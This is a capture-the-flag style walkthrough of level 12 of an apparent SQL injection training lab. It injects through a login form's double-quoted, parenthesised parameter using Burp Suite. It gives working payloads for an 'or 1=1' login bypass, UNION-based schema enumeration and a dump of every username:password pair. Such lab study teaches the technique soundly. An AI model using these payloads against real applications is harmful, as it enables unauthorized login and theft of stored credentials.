Less-12 POST -Error Based - Double quotes - String - with twist
Same as Less-11, with one difference: in Less-12 the parameters are wrapped in double quotes inside parentheses rather than single quotes. The exercise is done directly in Burp Suite and the steps mirror Less-11.
0x01. Original page
The login form sends two parameters, uname and passwd. In Burp the submitted body looks like uname=xxx&passwd=xxx.
0x02. Analyzing injection type
uname=1&passwd=1&submit=Submit
uname=1'&passwd=1&submit=Submit
uname=1"&passwd=1&submit=Submit
The single quote produces no error; the double quote does:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1
The error text is the remainder of the statement after the point where the quoting broke: MySQL choked on `1") LIMIT 0,1`, so the injected value sits inside a double-quoted string that is itself inside parentheses. Every payload therefore has to start by closing both, i.e. with `")`, and then comment out the trailing `) LIMIT 0,1` with `#` or `-- `.
0x03. Analyzing the injection point
Universal password (authentication bypass) attempt:
uname=1") or 1=1#&passwd=1&submit=Submit
The closing `")` ends the username comparison, `or 1=1` makes the WHERE clause true for every row, and `#` discards the password check and the LIMIT. The page shows the first row of the users table, confirming the injection point.
0x04. Determine the number of columns
uname=admin") order by 3#&passwd=1&submit=Submit
uname=admin") order by 2#&passwd=1&submit=Submit
`order by 3` raises an "Unknown column" error while `order by 2` succeeds, so the SELECT list of the vulnerable query has 2 columns. Note that this is the number of columns the query selects, not the number of columns in the users table; a UNION payload must supply exactly 2 values.
0x05. Get the current user and database name
uname=1") union select user(),database()--+&passwd=1&submit=Submit
The username 1 does not exist, so the original query returns no row and the row produced by the UNION is the one the page displays. `--+` works here because the `+` in the POST body is decoded to a space, giving MySQL the `-- ` comment; `#` works just as well.
0x06. Get all table names in the security database
uname=1") union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=1&submit=Submit
0x07. Get all column names of the users table
uname=1") union select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'#&passwd=1&submit=Submit
0x08. Dump all rows
uname=1") union select 1,group_concat(username,0x3a,password) from users#&passwd=1&submit=Submit
0x3a is the ASCII colon, so each row comes back as username:password, with rows separated by commas. group_concat is capped by group_concat_max_len (1024 bytes by default), so a large table may be truncated; if that happens, dump it in slices with LIMIT instead.